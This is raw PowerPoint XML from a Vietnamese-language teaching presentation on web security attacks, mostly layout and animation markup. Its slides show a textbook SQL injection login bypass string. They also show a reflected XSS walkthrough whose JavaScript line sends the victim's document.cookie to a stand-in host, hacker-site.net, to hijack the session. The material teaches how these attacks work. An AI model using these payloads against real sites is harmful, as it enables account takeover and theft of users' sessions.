                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM tbl_user WHERE username =  ' ' OR '1' = '1’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC02664-C891-F556-7420-8C9AECC6170F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9945269" y="3591939"/>
            <a:ext cx="7751273" cy="5055249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF524F44-140B-362F-B22D-42DE1D172B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12008040" y="8699016"/>
            <a:ext cx="4267199" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tấn công SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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62501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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="28"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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="7" grpId="0"/>
      <p:bldP spid="1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7A56EF-3B2C-6B51-C666-892F2E0FB2AE}"/>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54A07184-5F9A-89A7-47F8-EFFC2F2AA52F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F482E250-B3C8-9ED9-7A05-0F801B6A8DE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="525703"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780C51B3-1C39-F3D6-61B1-D48513633031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2095499"/>
            <a:ext cx="17602199" cy="8063089"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6329B0F9-9F4B-B52C-8DEB-5CAF73A9BD6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D78CE9-DDD7-6230-71F7-974624B035BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DE5E8F-3B54-5419-DCAA-2DC10C525997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965202" y="2267318"/>
            <a:ext cx="11049000" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">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rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">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3200" b="1">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3200" b="1">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Các cuộc tấn công có thể từ nhiều nguyên nhân (lỗ hổng ) khác nhau</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1">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F376A559-FC04-E6A7-4EFA-A2EC2D2B6F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933195" y="3418945"/>
            <a:ext cx="9863328" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3.2 Tấn công Cross-SiteScripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea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85901E13-8050-B840-6930-CA719FF60921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9748720" y="2857500"/>
            <a:ext cx="8298492" cy="6737424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EAA026-F022-65C3-5996-DB0E9576C341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937740" y="4178058"/>
            <a:ext cx="8810980" cy="5647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Người dùng đăng nhập web và giả sử được gán session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcdee4e59d4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Bằng cách nào đó, hacker gửi được cho người dùng URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Giả sử </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là website nạn nhân truy cập, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>hacker-site.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là trang của hacker tạo ra</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Đoạn javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>như sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>var i=new Image; i.src=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://hacker-site.net/”+document.cookie;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Dòng lệnh trên bản chất thực hiện request đến site của hacker với tham số là cookie người dùng:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25E4AAD-25C8-3CBA-B32F-B019ACB395DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12014202" y="9594925"/>
            <a:ext cx="3810000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tấn công Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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40575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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="28"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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="1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827562-53D1-A23D-8F15-E37454AE0570}"/>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DE4FC10A-66FE-1795-D5F9-93E018FB5432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118FB995-8F9D-5569-08B1-FD3C1989B6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
